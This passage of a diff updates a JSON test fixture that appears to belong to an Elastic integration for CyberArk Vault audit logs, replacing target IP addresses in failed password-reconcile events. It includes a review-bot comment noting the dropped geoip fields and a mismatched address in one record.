Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:46:13\",\"IsoTimestamp\":\"2021-03-14T13:46:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=34.123.103.115;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403079100Z", + "original": "\u003c7\u003e1 2021-03-14T13:46:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:46:13\",\"IsoTimestamp\":\"2021-03-14T13:46:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -365,19 +334,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -397,7 +355,7 @@ }, "@timestamp": "2021-03-14T14:49:11.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" 
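Review bot: The new side of the -365,19 hunk replaces `"ip": "34.66.114.180"` with `"ip": "67.43.156.15"` but drops the whole `destination.geo` object instead of regenerating it for the new address, so this expected document no longer asserts that the pipeline's geoip enrichment runs on `destination.ip`; the hunk at -486,19 has the same drop. If the test GeoIP database used by the pipeline tests resolves that range, the regenerated fixture should contain the corresponding `geo` fields rather than none; if it deliberately does not, that loss of coverage is worth recording in the package's test notes, since a JSON fixture cannot carry a comment. Separately, the -397,7 hunk sets `file.path` to `...WinDomain-67.43.156.14-ELASTICbart` while the same record's `destination.ip` is `67.43.156.15`, which is harmless for the test but makes the fixture harder to read than using one address per record.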
@@ -409,28 +367,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-14T14:49:11Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. 
Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=3;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"3\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615733350\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\n 
\u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"3\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615733350\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "3", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", 
"policy_id": "WinDomain", @@ -441,9 +399,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615733350", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -457,8 +415,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176781900Z", - "original": "\u003c7\u003e1 2021-03-14T14:49:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=3;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615733350\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 07:49:11\",\"IsoTimestamp\":\"2021-03-14T14:49:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=3;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615733350\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403084500Z", + "original": "\u003c7\u003e1 2021-03-14T14:49:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615733350\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 07:49:11\",\"IsoTimestamp\":\"2021-03-14T14:49:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=3;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615733350\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", 
